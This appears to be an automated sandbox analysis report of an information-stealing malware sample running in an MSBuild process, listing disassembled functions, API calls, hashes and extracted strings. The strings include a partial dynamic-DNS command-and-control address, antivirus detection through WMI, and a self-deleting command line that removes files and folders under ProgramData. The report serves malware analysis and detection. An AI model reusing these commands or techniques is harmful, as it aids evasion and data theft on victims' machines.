                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocateConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                                                                      • String ID: .exe$.exe$433cd71b7a2bdd3668a493b00ee95630$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                                                                                                                      • API String ID: 2665860859-3898869892
                                                                                                                                                                                                                      • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                                                                                      • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                                                                                                                      Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 004135EA
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0041398F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                      • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                      • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                                                                                      • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                                                                                                                      Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                      • String ID: GET$\xA
                                                                                                                                                                                                                      • API String ID: 442264750-571280152
                                                                                                                                                                                                                      • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                                                                                      • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                                                                                                                      Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                                                                                        • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                                                                                                                        • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                      • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                      • API String ID: 4288110179-315474579
                                                                                                                                                                                                                      • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                                                                                      • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                                                                                                                                      Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004012A7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004012B6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                                                                                                                        • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                                                                        • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                                                                        • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1553874529-0
                                                                                                                                                                                                                      • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                                                                                      • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                                                                                                                                      Function 00411203 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004112DD
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00411466
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                      • String ID: - $%s\%s$?
                                                                                                                                                                                                                      • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                      • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                                                                                      • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                                                                                                                                      Function 00418271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00418296
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004182A5
                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00418456
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00418465
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00418477
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00418487
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • " & exit, xrefs: 004183DA
                                                                                                                                                                                                                      • /c timeout /t 10 & del /f /q ", xrefs: 004182E5
                                                                                                                                                                                                                      • " & rd /s /q "C:\ProgramData\, xrefs: 00418333
                                                                                                                                                                                                                      • " & exit, xrefs: 00418389
                                                                                                                                                                                                                      • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                      • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                      • API String ID: 2823247455-1079830800
                                                                                                                                                                                                                      • Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                                                                                                                      • Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58
